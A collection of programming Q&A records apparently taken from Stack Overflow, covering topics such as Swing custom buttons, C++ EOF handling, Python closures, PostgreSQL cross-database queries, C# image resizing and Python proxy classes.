Yes, this is possible. One of the main pros for using Swing is the ease with which the abstract controls can be created and manipulates. Here is a quick and dirty way to extend the existing JButton class to draw a circle to the right of the text. ``` package test; import java.awt.Color; import java.awt.Container; import java.awt.Dimension; import java.awt.FlowLayout; import java.awt.Graphics; import javax.swing.JButton; import javax.swing.JFrame; public class MyButton extends JButton { private static final long serialVersionUID = 1L; private Color circleColor = Color.BLACK; public MyButton(String label) { super(label); } @Override protected void paintComponent(Graphics g) { super.paintComponent(g); Dimension originalSize = super.getPreferredSize(); int gap = (int) (originalSize.height * 0.2); int x = originalSize.width + gap; int y = gap; int diameter = originalSize.height - (gap * 2); g.setColor(circleColor); g.fillOval(x, y, diameter, diameter); } @Override public Dimension getPreferredSize() { Dimension size = super.getPreferredSize(); size.width += size.height; return size; } /*Test the button*/ public static void main(String[] args) { MyButton button = new MyButton("Hello, World!"); JFrame frame = new JFrame(); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.setSize(400, 400); Container contentPane = frame.getContentPane(); contentPane.setLayout(new FlowLayout()); contentPane.add(button); frame.setVisible(true); } } ``` Note that by overriding **paintComponent** that the contents of the button can be changed, but that the border is painted by the **paintBorder** method. The **getPreferredSize** method also needs to be managed in order to dynamically support changes to the content. Care needs to be taken when measuring font metrics and image dimensions. For creating a control that you can rely on, the above code is not the correct approach. Dimensions and colours are dynamic in Swing and are dependent on the look and feel being used. Even the default *Metal* look has changed across JRE versions. It would be better to implement **AbstractButton** and conform to the guidelines set out by the Swing API. A good starting point is to look at the **javax.swing.LookAndFeel** and **javax.swing.UIManager** classes. <http://docs.oracle.com/javase/8/docs/api/javax/swing/LookAndFeel.html> <http://docs.oracle.com/javase/8/docs/api/javax/swing/UIManager.html> Understanding the anatomy of LookAndFeel is useful for writing controls: [Creating a Custom Look and Feel](http://wayback.archive.org/web/20090309070901/http://java.sun.com/products/jfc/tsc/articles/sce/index.html)
Creating a custom JButton in Java
[ "", "java", "swing", "jbutton", "" ]
The following **C++** code uses a **ifstream** object to read integers from a text file (which has one number per line) until it hits **EOF**. Why does it read the integer on the last line twice? How to fix this? **Code:** ``` #include <iostream> #include <fstream> using namespace std; int main() { ifstream iFile("input.txt"); // input.txt has integers, one per line while (!iFile.eof()) { int x; iFile >> x; cerr << x << endl; } return 0; } ``` **input.txt**: ``` 10 20 30 ``` **Output**: ``` 10 20 30 30 ``` **Note**: I've skipped all error checking code to keep the code snippet small. The above behaviour is seen on Windows (Visual C++), cygwin (gcc) and Linux (gcc).
Just follow closely the chain of events. * Grab 10 * Grab 20 * Grab 30 * Grab EOF Look at the second-to-last iteration. You grabbed 30, then carried on to check for EOF. You haven't reached EOF because the EOF mark hasn't been read yet ("binarically" speaking, its conceptual location is just after the 30 line). Therefore you carry on to the next iteration. x is still 30 from previous iteration. Now you read from the stream and you get EOF. x remains 30 and the ios::eofbit is raised. You output to stderr x (which is 30, just like in the previous iteration). Next you check for EOF in the loop condition, and this time you're out of the loop. Try this: ``` while (true) { int x; iFile >> x; if( iFile.eof() ) break; cerr << x << endl; } ``` By the way, there is another bug in your code. Did you ever try to run it on an empty file? The behaviour you get is for the exact same reason.
I like this example, which for now, leaves out the check which you could add inside the while block: ``` ifstream iFile("input.txt"); // input.txt has integers, one per line int x; while (iFile >> x) { cerr << x << endl; } ``` Not sure how safe it is...
Reading from text file until EOF repeats last line
[ "", "c++", "iostream", "fstream", "" ]
I am getting C++ Compiler error C2371 when I include a header file that itself includes odbcss.h. My project is set to MBCS. > C:\Program Files\Microsoft SDKs\Windows\v6.0A\include\odbcss.h(430) : > error C2371: 'WCHAR' : redefinition; different basic types 1> > C:\Program Files\Microsoft SDKs\Windows\v6.0A\include\winnt.h(289) : > see declaration of 'WCHAR' I don't see any defines in odbcss.h that I could set to avoid this. Has anyone else seen this?
This is a known bug - see the Microsoft Connect website: <http://connect.microsoft.com/VisualStudio/feedback/ViewFeedback.aspx?FeedbackID=98699> The error doesn't occur if you compile your app as Unicode instead of MBCS.
There are a half-dozen posts on various forums around the web about this - it seems to potentially be an issue when odbcss.h is used in the presence of MFC. Most of the answers involve changing the order of included headers (voodoo debugging). The header that includes odbcss.h compiles fine in it's native project, but when it is included in a different project, it gives this error. We even put it in the latter project's stdafx.h, right after the base include for MFC, and still no joy. We finally worked around it by moving it into a cpp file in the original project, which does not use MFC (which should have been done anyway - but it wasn't our code). So we've got a work-around, but no real solution.
C++ Compiler Error C2371 - Redefinition of WCHAR
[ "", "c++", "visual-studio", "" ]
I'm in the process of weeding out all hardcoded values in a Java library and was wondering what framework would be the best (in terms of zero- or close-to-zero configuration) to handle run-time configuration? I would prefer XML-based configuration files, but it's not essential. Please do only reply if you have practical experience with a framework. I'm not looking for examples, but experience...
If your hardcoded values are just simple key-value pairs, you should look at [java.util.Properties](http://java.sun.com/j2se/1.5.0/docs/api/java/util/Properties.html). It's a lot simpler than xml, easier to use, and mind-numbingly trivial to implement. If you are working with Java and the data you are storing or retrieving from disk is modeled as a key value pair (which it sounds like it is in your case), then I really can't imagine a better solution. I have used properties files for simple configuration of small packages in a bigger project, and as a more global configuration for a whole project, and I have never had problems with it. Of course this has the huge benefit of not requiring any 3rd party libraries to utilize.
[Apache Commons Configuration](http://commons.apache.org/configuration/) works great. It supports having the configuration stored in a wide range of formats on the backend including properties, XML, JNDI, and more. It is easy to use and to extend. To get the most flexibility out of it use a [factory](http://en.wikipedia.org/wiki/Factory_method_pattern) to get the configuration and just use the [Configuration interface](http://commons.apache.org/configuration/apidocs/org/apache/commons/configuration/Configuration.html) after that. Two feature of Commons Configuration that differentiate it over a straight Properties file is that it support automatic conversion to common types (int, float, String arrays) and it supports property substitution: ``` server.host=myHost server.url=http://${server.host}/somePath ```
Java configuration framework
[ "", "java", "xml", "configuration", "frameworks", "configurationmanager", "" ]
I've been reading a lot about closures and I think I understand them, but without clouding the picture for myself and others, I am hoping someone can explain closures as succinctly and clearly as possible. I'm looking for a simple explanation that might help me understand where and why I would want to use them.
[Closure on closures](http://mrevelle.blogspot.com/2006/10/closure-on-closures.html) > Objects are data with methods > attached, closures are functions with > data attached. ``` def make_counter(): i = 0 def counter(): # counter() is a closure nonlocal i i += 1 return i return counter c1 = make_counter() c2 = make_counter() print (c1(), c1(), c2(), c2()) # -> 1 2 1 2 ```
It's simple: A function that references variables from a containing scope, potentially after flow-of-control has left that scope. That last bit is very useful: ``` >>> def makeConstantAdder(x): ... constant = x ... def adder(y): ... return y + constant ... return adder ... >>> f = makeConstantAdder(12) >>> f(3) 15 >>> g = makeConstantAdder(4) >>> g(3) 7 ``` Note that 12 and 4 have "disappeared" inside f and g, respectively, this feature is what make f and g proper closures.
Can you explain closures (as they relate to Python)?
[ "", "python", "functional-programming", "closures", "" ]
.NET Framework: 2.0 Preferred Language: C# I am new to TDD (Test Driven Development). First of all, is it even possible to unit test Windows Service? Windows service class is derived from ServiceBase, which has overridable methods, 1. OnStart 2. OnStop How can I trigger those methods to be called as if unit test is an actual service that calls those methods in proper order? At this point, am I even doing a Unit testing? or an Integration test? I have looked at WCF service question but it didn't make any sense to me since I have never dealt with WCF service.
I'd probably recommend designing your app so the "OnStart" and "OnStop" overrides in the Windows Service just call methods on a class library assembly. That way you can automate unit tests against the class library methods, and the design also abstracts your business logic from the implementation of a Windows Service. In this scenario, testing the "OnStart" and "OnStop" methods themselves in a Windows Service context would then be an integration test, not something you would automate.
I have unit tested windows services by not testing the service directly, but rather testing what the service does. Typically I create one assembly for the service and another for what the service does. Then I write unit tests against the second assembly. The nice thing about this approach is that your service is very thin. Basically all it does is call methods to do the right work at the right time. Your other assembly contains all the meat of the work your service intends to do. This makes it very easy to test and easy to reuse or modify as needed.
How can I unit test a Windows Service?
[ "", "c#", ".net", "unit-testing", "windows-services", "" ]
I would like to be able to use the `Tab` key within a text box to tab over four spaces. The way it is now, the Tab key jumps my cursor to the next input. Is there some JavaScript that will capture the Tab key in the text box before it bubbles up to the UI? I understand some browsers (i.e. FireFox) may not allow this. How about a custom key-combo like `Shift`+`Tab`, or `Ctrl`+`Q`?
Even if you capture the `keydown`/`keyup` event, those are the only events that the tab key fires, you still need some way to prevent the default action, moving to the next item in the tab order, from occurring. In Firefox you can call the `preventDefault()` method on the event object passed to your event handler. In IE, you have to return false from the event handle. The JQuery library provides a `preventDefault` method on its event object that works in IE and FF. ``` <body> <input type="text" id="myInput"> <script type="text/javascript"> var myInput = document.getElementById("myInput"); if(myInput.addEventListener ) { myInput.addEventListener('keydown',this.keyHandler,false); } else if(myInput.attachEvent ) { myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */ } function keyHandler(e) { var TABKEY = 9; if(e.keyCode == TABKEY) { this.value += " "; if(e.preventDefault) { e.preventDefault(); } return false; } } </script> </body> ```
I'd rather tab indentation not work than breaking tabbing between form items. If you want to indent to put in code in the Markdown box, use `Ctrl`+`K` (or ⌘K on a Mac). In terms of actually stopping the action, jQuery (which Stack Overflow uses) will stop an event from bubbling when you return false from an event callback. This makes life easier for working with multiple browsers.
Capturing TAB key in text box
[ "", "javascript", "user-interface", "" ]
I know that we can get the MAC address of a user via IE (ActiveX objects). Is there a way to obtain a user's MAC address using JavaScript?
I concur with all the previous answers that it would be a privacy/security vulnerability if you would be able to do this directly from Javascript. There are two things I can think of: * Using Java (with a signed applet) * Using signed Javascript, which in FF (and Mozilla in general) gets higher privileges than normal JS (but it is fairly complicated to set up)
The quick and simple answer is No. Javascript is quite a high level language and does not have access to this sort of information.
MAC addresses in JavaScript
[ "", "javascript", "mac-address", "" ]
Is there a programmatic way to build *htpasswd* files, without depending on OS specific functions (i.e. `exec()`, `passthru()`)?
.httpasswd files are just text files with a specific format depending on the hash function specified. If you are using MD5 they look like this: ``` foo:$apr1$y1cXxW5l$3vapv2yyCXaYz8zGoXj241 ``` That's the login, a colon, ,$apr1$, the salt and 1000 times md5 encoded as base64. If you select SHA1 they look like this: ``` foo:{SHA}BW6v589SIg3i3zaEW47RcMZ+I+M= ``` That's the login, a colon, the string {SHA} and the SHA1 hash encoded with base64. If your language has an implementation of either MD5 or SHA1 and base64 you can just create the file like this: ``` <?php $login = 'foo'; $pass = 'pass'; $hash = base64_encode(sha1($pass, true)); $contents = $login . ':{SHA}' . $hash; file_put_contents('.htpasswd', $contents); ?> ``` Here's more information on the format: <http://httpd.apache.org/docs/2.2/misc/password_encryptions.html>
From what it says on the PHP website, you can use crypt() in the following method: ``` <?php // Set the password & username $username = 'user'; $password = 'mypassword'; // Get the hash, letting the salt be automatically generated $hash = crypt($password); // write to a file file_set_contents('.htpasswd', $username ':' . $contents); ?> ``` Part of this example can be found: <https://www.php.net/crypt> This will of course overwrite the entire existing file, so you'll want to do some kind of concatination. I'm not 100% sure this will work, but I'm pretty sure.
Programmatically building htpasswd
[ "", "php", "automation", ".htpasswd", "" ]
I have a script that retrieves objects from a remote server through an Ajax call. The server returns objects in JSON notation.­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ However, in Adobe AIR, there is a restriction on using [eval()](http://labs.adobe.com/wiki/index.php/AIR:HTML_Security_FAQ#Why_restrict_eval.28.29_for_all_Application_content_if_there_are_legitimate_use_cases_for_using_it.3F) for security reasons. So I'm able to get replies from the remote server, but can't turn them back into JavaScript objects. Is there any workaround for this issue? I would like to use JSON for my JavaScript objects, since it can be used almost immediately. Side-note : I do understand the security implications for forcing the issue, but I will be doing some rapid application development for a competition, so the program would only be a quick prototype, and not used for production purposes. Nevertheless, it would be great if there's a better alternative to what I'm trying to do now --- **Update:** Thanks to [Theo](https://stackoverflow.com/a/24919/7750640) and [jsight](https://stackoverflow.com/a/21716/7750640) for their answers; One important thing I learnt today is that I can actually make use of ActionScript libraries by using the ``` <script src="lib/myClasses.swf" type="application/x-shockwave-flash"></script> ``` tag extended by Adobe AIR. Check out [Theo's](https://stackoverflow.com/a/24919/7750640) link for more details!
You can find a [JSON parser written in JavaScript here](http://www.JSON.org/js.html) ([source code here](https://github.com/douglascrockford/JSON-js/blob/master/json2.js)). You can also use the as3corelib JSON parser from JavaScript, there's [a description of how to access ActionScript libraries from JavaScript here](http://help.adobe.com/en_US/AIR/1.1/devappshtml/WS5b3ccc516d4fbf351e63e3d118666ade46-7ed9.html).
The current AIR release (v2.5) bundles a newer WebKit that has native JSON support, via JSON.stringify() and JSON.parse().
Adobe AIR: Handling JSON objects from server
[ "", "javascript", "ajax", "json", "air", "" ]
I have one field that I need to sum lets say named items However that field can be part of group a or b In the end I need to have all of the items summed for group a and group b when I say grouped I mean there is a LEFT OUTER JOIN to another table the previous table has a type for the items and the one being joined has a group assigned for this item type Sorry guys Im a little new to sql I am going to try out what you have given me an get back to you Ok I feel like we are getting close just not yet allain's I can get them to separate but the issue I need to have both groups to sum on the same row which is difficult because I also have several LEFT OUTER JOIN's involved Tyler's looks like it might work too so I am trying to hash that out real fast Alain's seems to be the way to go but I have to tweek it a little more
Maybe I'm not understanding the complexity of what you're asking but... shouldn't this do? ``` SELECT groupname, SUM(value) FROM items WHERE groupname IN ('a', 'b') GROUP BY groupname ``` And if you don't care which of a or b the item belongs to then this will do: ``` SELECT SUM(value) FROM items WHERE groupname IN ('a', 'b') ```
You want something like ``` SELECT column,SUM( column ) FROM table GROUP BY column ```
Returning the sum of items depending on which type it is
[ "", "sql", "sql-server", "" ]
I haven't used `C++` since college. Even though I've wanted to I haven't needed to do any until I started wanting to write plugins for `Launchy`. > Is there a good book to read to get back into it? My experience since college is mainly `C#` and recently `ruby`. I bought some book for `C#` developers and it ended up being on how to write `C++` with `CLI`. While a good book it wasn't quite what I was looking for.
The best way to get back into C++ is to jump in. You can't learn a real language without spending any serious time in a country where they speak it. I wouldn't try to learn a programming language without spending time coding in it either. I wouldn't recommend learning C first though. That's a good way to pick up some bad habits in C++.
My favorites are Effective C++, More Effective C++, and Effective STL by Scott Meyers. Also C++ Coding Standards by Sutter and Alexandrescu.
Get back to basics. How do I get back into C++?
[ "", "c++", "" ]
I searched for this subject on Google and got some website about an experts exchange...so I figured I should just ask here instead. How do you embed a `JApplet` in HTML on a webpage?
Here is an example from [sun's website](http://java.sun.com/docs/books/tutorial/uiswing/components/applet.html): ``` <applet code="TumbleItem.class" codebase="examples/" archive="tumbleClasses.jar, tumbleImages.jar" width="600" height="95"> <param name="maxwidth" value="120"> <param name="nimgs" value="17"> <param name="offset" value="-57"> <param name="img" value="images/tumble"> Your browser is completely ignoring the &lt;APPLET&gt; tag! </applet> ```
Although you didn't say so, just in case you were using JSPs, you also have the option of the [jsp:plugin](http://java.sun.com/products/jsp/tags/syntaxref.fm12.html) tag?
Java: JApplet, How do you embed it in a webpage?
[ "", "java", "html", "web-applications", "" ]
I'm going to guess that the answer is "no" based on the below error message (and [this Google result](http://archives.postgresql.org/pgsql-sql/2004-08/msg00076.php)), but is there anyway to perform a cross-database query using PostgreSQL? ``` databaseA=# select * from databaseB.public.someTableName; ERROR: cross-database references are not implemented: "databaseB.public.someTableName" ``` I'm working with some data that is partitioned across two databases although data is really shared between the two (userid columns in one database come from the `users` table in the other database). I have no idea why these are two separate databases instead of schema, but c'est la vie...
*Note: As the original asker implied, if you are setting up two databases on the same machine you probably want to make two [schemas](https://www.postgresql.org/docs/current/static/ddl-schemas.html) instead - in that case you don't need anything special to query across them.* ## `postgres_fdw` Use [`postgres_fdw`](https://www.postgresql.org/docs/current/postgres-fdw.html) (foreign data wrapper) to connect to tables in any Postgres database - local or remote. Note that there are [foreign data wrappers for other popular data sources](http://wiki.postgresql.org/wiki/Foreign_data_wrappers). At this time, only `postgres_fdw` and `file_fdw` are part of the official Postgres distribution. ### For Postgres versions before 9.3 Versions this old are no longer supported, but if you need to do this in a pre-2013 Postgres installation, there is a function called [`dblink`](https://www.postgresql.org/docs/current/dblink.html). I've never used it, but it is maintained and distributed with the rest of PostgreSQL. If you're using the version of PostgreSQL that came with your Linux distro, you might need to install a package called postgresql-contrib.
# [dblink()](http://www.postgresql.org/docs/current/interactive/dblink.html) -- executes a query in a remote database > dblink executes a query (usually a SELECT, but it can be any SQL > statement that returns rows) in a remote database. > > When two text arguments are given, the first one is first looked up as > a persistent connection's name; if found, the command is executed on > that connection. If not found, the first argument is treated as a > connection info string as for dblink\_connect, and the indicated > connection is made just for the duration of this command. one of the good example: ``` SELECT * FROM table1 tb1 LEFT JOIN ( SELECT * FROM dblink('dbname=db2','SELECT id, code FROM table2') AS tb2(id int, code text); ) AS tb2 ON tb2.column = tb1.column; ``` Note: I am giving this information for future reference. [Reference](https://stackoverflow.com/questions/4678862/joining-results-from-two-separate-databases)
Possible to perform cross-database queries with PostgreSQL?
[ "", "sql", "postgresql", "" ]
Why are SQL distributions so non-standard despite an ANSI standard existing for SQL? Are there really that many meaningful differences in the way SQL databases work or is it just the two databases with which I have been working: MS-SQL and PostgreSQL? Why do these differences arise?
It's a form of "Stealth lock-in". Joel goes into great detail here: * <http://www.joelonsoftware.com/articles/fog0000000056.html> * <http://www.joelonsoftware.com/articles/fog0000000052.html> Companies end up tying their business functionality to non-standard or weird unsupported functionality in their implementation, this restricts their ability to move away from their vendor to a competitor. On the other hand, it's pretty short-sighted because anyone with half a brain will tend to abstract away the proprietary pieces, or avoid the lock-in altogether, if it gets too egregious.
The ANSI standard specifies only a limited set of commands and data types. Once you go beyond those, the implementors are on their own. And some very important concepts aren't specified at all, such as auto-incrementing columns. SQLite just picks the first non-null integer, MySQL requires `AUTO INCREMENT`, PostgreSQL uses sequences, etc. It's a mess, and that's only among the OSS databases! Try getting Oracle, Microsoft, and IBM to collectively decide on a tricky bit of functionality.
Reasons for SQL differences
[ "", "sql", "sql-server", "postgresql", "" ]
I've used the StAX API in Java quite a bit, and find it quite a clean way of dealing with XML files. Is there any equivalent library I could use for performing similar processing in C?
[libxml](http://xmlsoft.org/) is a heavily used and documented XML library for C, which provides a SAX API. [Expat](http://expat.sourceforge.net/) is another, but in my experience is not as well documented.
I have used Expat pretty extensively - I like it for its simplicity and small footprint.
Equivalent to StAX for C
[ "", "java", "c", "xml", "" ]
Does anyone have the secret formula to resizing transparent images (mainly GIFs) *without* ANY quality loss - what so ever? I've tried a bunch of stuff, the closest I get is not good enough. Take a look at my main image: <http://www.thewallcompany.dk/test/main.gif> And then the scaled image: <http://www.thewallcompany.dk/test/ScaledImage.gif> ``` //Internal resize for indexed colored images void IndexedRezise(int xSize, int ySize) { BitmapData sourceData; BitmapData targetData; AdjustSizes(ref xSize, ref ySize); scaledBitmap = new Bitmap(xSize, ySize, bitmap.PixelFormat); scaledBitmap.Palette = bitmap.Palette; sourceData = bitmap.LockBits(new Rectangle(0, 0, bitmap.Width, bitmap.Height), ImageLockMode.ReadOnly, bitmap.PixelFormat); try { targetData = scaledBitmap.LockBits(new Rectangle(0, 0, xSize, ySize), ImageLockMode.WriteOnly, scaledBitmap.PixelFormat); try { xFactor = (Double)bitmap.Width / (Double)scaledBitmap.Width; yFactor = (Double)bitmap.Height / (Double)scaledBitmap.Height; sourceStride = sourceData.Stride; sourceScan0 = sourceData.Scan0; int targetStride = targetData.Stride; System.IntPtr targetScan0 = targetData.Scan0; unsafe { byte* p = (byte*)(void*)targetScan0; int nOffset = targetStride - scaledBitmap.Width; int nWidth = scaledBitmap.Width; for (int y = 0; y < scaledBitmap.Height; ++y) { for (int x = 0; x < nWidth; ++x) { p[0] = GetSourceByteAt(x, y); ++p; } p += nOffset; } } } finally { scaledBitmap.UnlockBits(targetData); } } finally { bitmap.UnlockBits(sourceData); } } ``` I'm using the above code, to do the indexed resizing. Does anyone have improvement ideas?
If there's no requirement on preserving file type after scaling I'd recommend the following approach. ``` using (Image src = Image.FromFile("main.gif")) using (Bitmap dst = new Bitmap(100, 129)) using (Graphics g = Graphics.FromImage(dst)) { g.SmoothingMode = SmoothingMode.AntiAlias; g.InterpolationMode = InterpolationMode.HighQualityBicubic; g.DrawImage(src, 0, 0, dst.Width, dst.Height); dst.Save("scale.png", ImageFormat.Png); } ``` The result will have really nice anti aliased edges * *removed image shack image that had been replaced by an advert* If you must export the image in gif you're in for a ride; GDI+ doesn't play well with gif. See [this blog post](http://www.ben-rush.net/blog/PermaLink.aspx?guid=103ed74d-c808-47ba-b82d-6e9367714b3e&dotnet=consultant) about it for more information **Edit:** I forgot to dispose of the bitmaps in the example; it's been corrected
This is a basic resize function I've used for a few of my applications that leverages GDI+ ``` /// <summary> /// Resize image with GDI+ so that image is nice and clear with required size. /// </summary> /// <param name="SourceImage">Image to resize</param> /// <param name="NewHeight">New height to resize to.</param> /// <param name="NewWidth">New width to resize to.</param> /// <returns>Image object resized to new dimensions.</returns> /// <remarks></remarks> public static Image ImageResize(Image SourceImage, Int32 NewHeight, Int32 NewWidth) { System.Drawing.Bitmap bitmap = new System.Drawing.Bitmap(NewWidth, NewHeight, SourceImage.PixelFormat); if (bitmap.PixelFormat == Drawing.Imaging.PixelFormat.Format1bppIndexed | bitmap.PixelFormat == Drawing.Imaging.PixelFormat.Format4bppIndexed | bitmap.PixelFormat == Drawing.Imaging.PixelFormat.Format8bppIndexed | bitmap.PixelFormat == Drawing.Imaging.PixelFormat.Undefined | bitmap.PixelFormat == Drawing.Imaging.PixelFormat.DontCare | bitmap.PixelFormat == Drawing.Imaging.PixelFormat.Format16bppArgb1555 | bitmap.PixelFormat == Drawing.Imaging.PixelFormat.Format16bppGrayScale) { throw new NotSupportedException("Pixel format of the image is not supported."); } System.Drawing.Graphics graphicsImage = System.Drawing.Graphics.FromImage(bitmap); graphicsImage.SmoothingMode = Drawing.Drawing2D.SmoothingMode.HighQuality; graphicsImage.InterpolationMode = Drawing.Drawing2D.InterpolationMode.HighQualityBicubic; graphicsImage.DrawImage(SourceImage, 0, 0, bitmap.Width, bitmap.Height); graphicsImage.Dispose(); return bitmap; } ``` I don't remember off the top of my head if it will work with GIFs, but you can give it a try. Note: I can't take full credit for this function. I pieced a few things together from some other samples online and made it work to my needs 8^D
Resize transparent images using C#
[ "", "c#", ".net", "image", "resize", "image-scaling", "" ]
I use Firebug and the Mozilla JS console heavily, but every now and then I run into an IE-only JavaScript bug, which is really hard to locate (ex: *error on line 724*, when the source HTML only has 200 lines). I would love to have a lightweight JS tool (*a la* firebug) for Internet Explorer, something I can install in seconds on a client's PC if I run into an error and then uninstall. Some Microsoft tools take some serious download and configuration time. Any ideas?
You might find [Firebug Lite](http://getfirebug.com/lite.html) useful for that. Its bookmarklet should be especially useful when debugging on a user's machine.
Since Internet Explorer 8, IE has been shipping with a pretty impressive set of tools for JavaScript debugging, profiling, and more. Like most other browsers, the developer tools are accessible by pressing F12 on your keyboard. ### Script Tab The Script tab is likely what you'll be interested in, though the Console, Profiler, and Network tabs get plenty of use as well while debugging applications. ![enter image description here](https://i.stack.imgur.com/MawsG.png) From the Script tab you can: * Format JavaScript to make it more readable * Move from source to source of various resources on the page * Insert breakpoints * Move in and over lines of code while stepping through its execution * Watch variables * Inspect the call stack to see how code was executed * Toggle breakpoints * and more... ### Console Tab The console tab is great for when you need to execute some arbitrary code against the application. I use this to check the return of certain methods, or even to quickly test solutions for answers on Stack Overflow. ![enter image description here](https://i.stack.imgur.com/uKoi7.png) ### Profiler Tab The profile is awesome if you're looking for long-running processes, or trying to optimize your code to run smoother or make fewer calls to resource-intensive methods. Open up any page and click "Start profiling" from the Profiler tab to start recording. While the profiler is working, you can move about the page, performing common actions. When you feel you've recorded enough, hit "Stop profiling." You will then be shown a summary of all functions ran, or a call tree. You can quickly sort this data by various columns: ![enter image description here](https://i.stack.imgur.com/De6ob.png) ### Network Tab The network tab will record traffic on your site/application. It's very handy for finding files that aren't being downloaded, hanging, or for tracking data that is being requested asynchronously. Within this tab you can also move between a Summary view and a Detailed view. Within the Detailed view you can inspect headers sent with requests, and responses. You can view cookie information, check the timing of events, and more. ![enter image description here](https://i.stack.imgur.com/vcREz.png) I'm not really doing the IE Developer Tools justice - there is a lot of uncovered ground. I would encourage you to check them out though, and make them a part of your development.
JavaScript Troubleshooting Tools in Internet Explorer
[ "", "javascript", "internet-explorer", "debugging", "" ]
If I use `assert()` and the assertion fails then `assert()` will call `abort()`, ending the running program abruptly. I can't afford that in my production code. Is there a way to assert in runtime yet be able to catch failed assertions so I have the chance to handle them gracefully?
Yes, as a matter of fact there is. You will need to write a custom assert function yourself, as C++'s `assert()` is exactly C's `assert()`, with the `abort()` "feature" bundled in. Fortunately, this is surprisingly straightforward. *Assert.hh* ``` template <typename X, typename A> inline void Assert(A assertion) { if( !assertion ) throw X(); } ``` The above function will throw an exception if a predicate doesn't hold. You will then have the chance to catch the exception. If you don't catch the exception, `terminate()` will be called, which will end the program similarly to `abort()`. You may wonder what about optimizing away the assertion when we're building for production. In this case, you can define constants that will signify that you're building for production and then refer to the constant when you `Assert()`. *debug.hh* ``` #ifdef NDEBUG const bool CHECK_WRONG = false; #else const bool CHECK_WRONG = true; #endif ``` *main.cc* ``` #include<iostream> struct Wrong { }; int main() { try { Assert<Wrong>(!CHECK_WRONG || 2 + 2 == 5); std::cout << "I can go to sleep now.\n"; } catch( Wrong e ) { std::cerr << "Someone is wrong on the internet!\n"; } return 0; } ``` If `CHECK_WRONG` is a constant then the call to `Assert()` will be compiled away in production, even if the assertion is not a constant expression. There is a slight disadvantage in that by referring to `CHECK_WRONG` we type a little more. But in exchange we gain an advantage in that we can classify various groups of assertions and enable and disable each of them as we see fit. So, for example we could define a group of assertions that we want enabled even in production code, and then define a group of assertions that we only want to see in development builds. The `Assert()` function is equivalent to typing ``` if( !assertion ) throw X(); ``` but it clearly indicates the intent of the programmer: make an assertion. Assertions are also easier to grep for with this approach, just like plain `assert()`s. For more details on this technique see Bjarne Stroustrup's The C++ Programming Language 3e, section 24.3.7.2.
[glib's error reporting functions](http://library.gnome.org/devel/glib/unstable/glib-Warnings-and-Assertions.html "glib documentation for error reporting functions") take the approach of continuing after an assert. glib is the underlying platform independence library that Gnome (via GTK) uses. Here's a macro that checks a precondition and prints a stack trace if the precondition fails. ``` #define RETURN_IF_FAIL(expr) do { \ if (!(expr)) \ { \ fprintf(stderr, \ "file %s: line %d (%s): precondition `%s' failed.", \ __FILE__, \ __LINE__, \ __PRETTY_FUNCTION__, \ #expr); \ print_stack_trace(2); \ return; \ }; } while(0) #define RETURN_VAL_IF_FAIL(expr, val) do { \ if (!(expr)) \ { \ fprintf(stderr, \ "file %s: line %d (%s): precondition `%s' failed.", \ __FILE__, \ __LINE__, \ __PRETTY_FUNCTION__, \ #expr); \ print_stack_trace(2); \ return val; \ }; } while(0) ``` Here's the function that prints the stack trace, written for an environment that uses the gnu toolchain (gcc): ``` void print_stack_trace(int fd) { void *array[256]; size_t size; size = backtrace (array, 256); backtrace_symbols_fd(array, size, fd); } ``` This is how you'd use the macros: ``` char *doSomething(char *ptr) { RETURN_VAL_IF_FAIL(ptr != NULL, NULL); // same as assert(ptr != NULL), but returns NULL if it fails. if( ptr != NULL ) // Necessary if you want to define the macro only for debug builds { ... } return ptr; } void doSomethingElse(char *ptr) { RETURN_IF_FAIL(ptr != NULL); } ```
How can I assert() without using abort()?
[ "", "c++", "exception", "assert", "" ]
Below I have a very simple example of what I'm trying to do. I want to be able to use HTMLDecorator with any other class. Ignore the fact it's called decorator, it's just a name. ``` import cgi class ClassX(object): pass # ... with own __repr__ class ClassY(object): pass # ... with own __repr__ inst_x=ClassX() inst_y=ClassY() inst_z=[ i*i for i in range(25) ] inst_b=True class HTMLDecorator(object): def html(self): # an "enhanced" version of __repr__ return cgi.escape(self.__repr__()).join(("<H1>","</H1>")) print HTMLDecorator(inst_x).html() print HTMLDecorator(inst_y).html() wrapped_z = HTMLDecorator(inst_z) inst_z[0] += 70 wrapped_z[0] += 71 print wrapped_z.html() print HTMLDecorator(inst_b).html() ``` Output: ``` Traceback (most recent call last): File "html.py", line 21, in print HTMLDecorator(inst_x).html() TypeError: default __new__ takes no parameters ``` Is what I'm trying to do possible? If so, what am I doing wrong?
> Very close, but then I lose everything from ClassX. Below is something a collegue gave me that does do the trick, but it's hideous. There has to be a better way. Looks like you're trying to set up some sort of proxy object scheme. That's doable, and there are better solutions than your colleague's, but first consider whether it would be easier to just patch in some extra methods. This won't work for built-in classes like `bool`, but it will for your user-defined classes: ``` def HTMLDecorator (obj): def html (): sep = cgi.escape (repr (obj)) return sep.join (("<H1>", "</H1>")) obj.html = html return obj ``` And here is the proxy version: ``` class HTMLDecorator(object): def __init__ (self, wrapped): self.__wrapped = wrapped def html (self): sep = cgi.escape (repr (self.__wrapped)) return sep.join (("<H1>", "</H1>")) def __getattr__ (self, name): return getattr (self.__wrapped, name) def __setattr__ (self, name, value): if not name.startswith ('_HTMLDecorator__'): setattr (self.__wrapped, name, value) return super (HTMLDecorator, self).__setattr__ (name, value) def __delattr__ (self, name): delattr (self.__wraped, name) ```
